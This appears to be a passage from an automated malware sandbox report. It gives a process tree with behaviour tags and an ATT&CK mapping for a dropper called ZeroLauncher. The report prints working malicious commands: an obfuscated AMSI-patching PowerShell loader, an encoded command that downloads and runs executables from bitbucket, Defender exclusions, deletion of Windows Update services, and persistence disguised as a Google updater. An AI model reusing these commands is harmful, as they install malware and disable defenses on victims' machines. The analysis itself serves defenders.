bMCouL,[uint32]8,4,[ref]$JyBgUepfnL);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$mTavQYKWrySbMCouL,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GnZMUfwHGMDeKbFnX,$MqsjxbDDMdHEZyKYEFkaNV).Invoke($mTavQYKWrySbMCouL,[uint32]8,0x20,[ref]$JyBgUepfnL);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+''+'T'+'WAR'+[Char](69)+'').GetValue('d'+[Char](105)+'a'+[Char](108)+'er'+[Char](115)+''+[Char](116)+''+[Char](97)+''+'g'+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:552 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:432
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:WzXMwGsYcsrk{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$WRWCLyLgSXYTYz,[Parameter(Position=1)][Type]$nvLwKBJEcy)$zYpVtyJnWZD=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'f'+[Char](108)+'e'+[Char](99)+''+[Char](116)+''+[Char](101)+'d'+'D'+'e'+[Char](108)+'e'+'g'+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+'M'+''+'e'+'m'+[Char](111)+''+'r'+'y'+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+'e',$False).DefineType(''+[Char](77)+'y'+'D'+''+[Char](101)+''+'l'+''+[Char](101)+'g'+[Char](97)+'t'+'e'+''+[Char](84)+''+'y'+''+'p'+''+[Char](101)+'','C'+'l'+''+[Char](97)+''+'s'+''+'s'+''+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+''+'e'+'a'+[Char](108)+'e'+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+''+[Char](115)+'i'+[Char](67)+''+'l'+''+[Char](97)+'s'+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+'t'+'o'+''+'C'+'l'+[Char](97)+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$zYpVtyJnWZD.DefineConstructor(''+'R'+'T'+[Char](83)+''+'p'+''+[Char](101)+'c'+[Char](105)+'a'+[Char](108)+'Na'+'m'+''+'e'+','+'H'+'i'+[Char](100)+''+[Char](101)+'By'+[Char](83)+'i'+[Char](103)+''+[Char](44)+''+[Char](80)+'u'+[Char](98)+''+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$WRWCLyLgSXYTYz).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+[Char](116)+''+[Char](105)+''+'m'+''+'e'+''+','+''+'M'+'a'+[Char](110)+''+'a'+'g'+[Char](101)+''+'d'+'');$zYpVtyJnWZD.DefineMethod('I'+[Char](110)+'v'+'o'+''+[Char](107)+''+'e'+'',''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+''+'i'+''+'c'+''+','+''+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+''+'B'+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+'NewS'+[Char](108)+'o'+'t'+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$nvLwKBJEcy,$WRWCLyLgSXYTYz).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+[Char](116)+'i'+[Char](109)+''+'e'+''+[Char](44)+''+'M'+''+'a'+''+'n'+''+'a'+''+'g'+''+[Char](101)+''+'d'+'');Write-Output $zYpVtyJnWZD.CreateType();}$xyTjdRLMLpfuv=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+'t'+'e'+''+'m'+''+[Char](46)+'d'+[Char](108)+''+'l'+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+[Char](115)+''+'o'+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+'3'+''+[Char](50)+'.'+[Char](85)+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](120)+''+[Char](121)+''+[Char](84)+'j'+[Char](100)+''+[Char](82)+''+[Char](76)+''+'M'+''+[Char](76)+''+'p'+'fu'+[Char](118)+'');$OHeGrmYKcmJosw=$xyTjdRLMLpfuv.GetMethod(''+[Char](79)+''+'H'+'e'+[Char](71)+'r'+'m'+'Y'+[Char](75)+''+[Char](99)+'m'+'J'+'o'+[Char](115)+''+'w'+'',[Reflection.BindingFlags]''+'P'+''+[Char](117)+'b'+[Char](108)+'i'+[Char](99)+''+','+''+[Char](83)+'t'+[Char](97)+'t'+'i'+''+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ufkvVzHlnmRDMZKtvnV=WzXMwGsYcsrk @([String])([IntPtr]);$icPkYZJUWRVGtqdhHmAMfU=WzXMwGsYcsrk @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$gHhIpPOHgvX=$xyTjdRLMLpfuv.GetMethod('Ge'+[Char](116)+''+[Char](77)+''+'o'+'d'+'u'+''+[Char](108)+''+[Char](101)+''+[Char](72)+''+'a'+''+'n'+''+'d'+''+[Char](108)+'e').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+'rn'+[Char](101)+''+[Char](108)+''+'3'+''+'2'+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l')));$tapQFYLEsRxHpQ=$OHeGrmYKcmJosw.Invoke($Null,@([Object]$gHhIpPOHgvX,[Object]('L'+[Char](111)+''+[Char](97)+''+[Char](100)+''+'L'+'ib'+[Char](114)+''+'a'+''+[Char](114)+''+[Char](121)+'A')));$EtSYkJgqYMpkeIgEL=$OHeGrmYKcmJosw.Invoke($Null,@([Object]$gHhIpPOHgvX,[Object](''+'V'+''+[Char](105)+''+'r'+''+[Char](116)+''+'u'+''+[Char](97)+''+'l'+''+[Char](80)+''+'r'+''+[Char](111)+''+'t'+'e'+[Char](99)+''+[Char](116)+'')));$VNzDdDF=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($tapQFYLEsRxHpQ,$ufkvVzHlnmRDMZKtvnV).Invoke(''+[Char](97)+''+'m'+''+[Char](115)+''+'i'+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$gmIFsyNIDmCxdIBvA=$OHeGrmYKcmJosw.Invoke($Null,@([Object]$VNzDdDF,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+'S'+'c'+''+[Char](97)+''+[Char](110)+'Bu'+[Char](102)+''+[Char](102)+''+'e'+''+[Char](114)+'')));$EMMGihlwiS=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($EtSYkJgqYMpkeIgEL,$icPkYZJUWRVGtqdhHmAMfU).Invoke($gmIFsyNIDmCxdIBvA,[uint32]8,4,[ref]$EMMGihlwiS);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$gmIFsyNIDmCxdIBvA,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($EtSYkJgqYMpkeIgEL,$icPkYZJUWRVGtqdhHmAMfU).Invoke($gmIFsyNIDmCxdIBvA,[uint32]8,0x20,[ref]$EMMGihlwiS);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+'F'+''+'T'+''+[Char](87)+''+'A'+''+[Char](82)+'E').GetValue(''+[Char](100)+''+[Char](105)+''+'a'+'l'+'e'+''+'r'+''+[Char](115)+'t'+'a'+''+[Char](103)+'e'+'r'+'')).EntryPoint.Invoke($Null,$Null)2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3968 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:616
-
-
-
C:\Users\Admin\AppData\Roaming\Win32Sync\svcupdater.exeC:\Users\Admin\AppData\Roaming\Win32Sync\svcupdater.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4656
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵PID:1252
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1332
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1400
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1492
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:700
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1608
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:1644
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1660
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1668
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1748
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1828
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1860
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1136
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1708
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1808
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2064
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:2076
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2204
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2244
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:2380
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2388
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2428
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2476
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2500
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2516
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2552
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2564
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2572
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:1076
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2776
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3328
-
C:\Users\Admin\AppData\Local\Temp\ZeroLauncher.exe"C:\Users\Admin\AppData\Local\Temp\ZeroLauncher.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4252 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcgB4ACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAG4AdQBzACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcATgBvACAAVgBpAHIAdAB1AGEAbAAgAE0AYQBjAGgAaQBuAGUALwBTAGUAcgB2AGUAcgAgAGkAcwAgAGEAbABsAG8AdwBlAGQAIQAgAFQAcgB5ACAAcgB1AG4AbgBpAG4AZwAgAG8AbgAgAGEAIABkAGkAZgBmAGUAcgBlAG4AdAAgAGQAZQB2AGkAYwBlACEAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAawBrACMAPgA7ACIAOwA8ACMAZQBmAHIAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAHAAZwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBuAHoAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBhAHEAZAAjAD4AOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvADUAOQA0ADAAagBnADkAOAAzADQALwBnAGYAMwA0ADQAMwBmADMALwByAGEAdwAvADAAYQBkAGYAYQBlAGYANABmADgANAA3AGEAMQA3AGUAYQA0AGUANABmADYANQA2AGQAYwBkADgANQBlADcANgAyADkAMwA3ADgAMABlAGQALwBEAC4AZQB4AGUAJwAsACAAPAAjAHAAagB4ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAdgBjAHkAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAeQBjAHkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABpAGMAZQBuAHMAZQBHAGUAdAAuAGUAeABlACcAKQApADwAIwBiAGcAawAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAGkAdABiAHUAYwBrAGUAdAAuAG8AcgBnAC8AcgBlAGMAaABlAGEAdABzAG8AcgBnAC8AcgBlAGMAaABlAGEAdABzAGQAaQByAGUAYwB0AC8AcgBhAHcALwAwADAAZQBiADIAZAAwAGIANAAzADYANQA5ADEAZgBjAGUAMQAxADUAMwBiAGEAYwBhADcANgAyADUAMAA5AGUANwA2ADIAZgAyAGMAZQA0AC8AQwBMAFAALgBlAHgAZQAnACwAIAA8ACMAcwBiAGQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBoAHEAdQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBrAHcAcwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAGkAYwBDAGgAZQBjAGsALgBlAHgAZQAnACkAKQA8ACMAawBpAHgAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvAHIAZQBjAGgAZQBhAHQAcwBvAHIAZwAvAHIAZQBjAGgAZQBhAHQAcwBkAGkAcgBlAGMAdAAvAHIAYQB3AC8AMAAwAGUAYgAyAGQAMABiADQAMwA2ADUAOQAxAGYAYwBlADEAMQA1ADMAYgBhAGMAYQA3ADYAMgA1ADAAOQBlADcANgAyAGYAMgBjAGUANAAvAEQAZQB2AG0AaQBuAC4AZQB4AGUAJwAsACAAPAAjAGQAdQBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAaABoAHQAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdQBzAHIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABpAGMAUwBlAG4AZAAuAGUAeABlACcAKQApADwAIwBoAHcAbgAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBjAG0AagAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZwB1AGoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABpAGMAZQBuAHMAZQBHAGUAdAAuAGUAeABlACcAKQA8ACMAdABhAGIAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAaQB1AG4AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHYAaQBlACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAaQBjAEMAaABlAGMAawAuAGUAeABlACcAKQA8ACMAbgBqAHcAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAaQB4AGkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHQAbQBsACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAaQBjAFMAZQBuAGQALgBlAHgAZQAnACkAPAAjAGQAbgBnACMAPgA="3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2848 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#nus#>[System.Windows.Forms.MessageBox]::Show('No Virtual Machine/Server is allowed! Try running on a different device!','','OK','Error')<#wkk#>;4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3232
-
-
C:\Users\Admin\AppData\Local\Temp\LicenseGet.exe"C:\Users\Admin\AppData\Local\Temp\LicenseGet.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2652
-
-
C:\Users\Admin\AppData\Local\Temp\LicCheck.exe"C:\Users\Admin\AppData\Local\Temp\LicCheck.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2100 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /tn "svcupdater" /tr "C:\Users\Admin\AppData\Roaming\Win32Sync\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4944 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:5000
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\LicSend.exe"C:\Users\Admin\AppData\Local\Temp\LicSend.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2416
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4884
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3344 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:4720
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:3132
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:4768
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:4000
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:3312
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:4212
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:228
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
PID:236
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:2728
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:928
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of WriteProcessMemory
PID:3484 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4152
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3880
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4860
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3052
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ncotqmia#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5108
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵PID:2376
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3444
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:3500
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3856
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3924
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3984
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc1⤵PID:4016
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵PID:4268
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc1⤵PID:4356
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:4804
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:3992
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:2280
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3416
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:4468
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:3732
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2164
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:4556
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3420
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:2096
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Create or Modify System Process
2Windows Service
2Power Settings
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
1Indicator Removal
1Clear Windows Event Logs
1Modify Registry
1Obfuscated Files or Information
1Command Obfuscation
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD522e796539d05c5390c21787da1fb4c2b
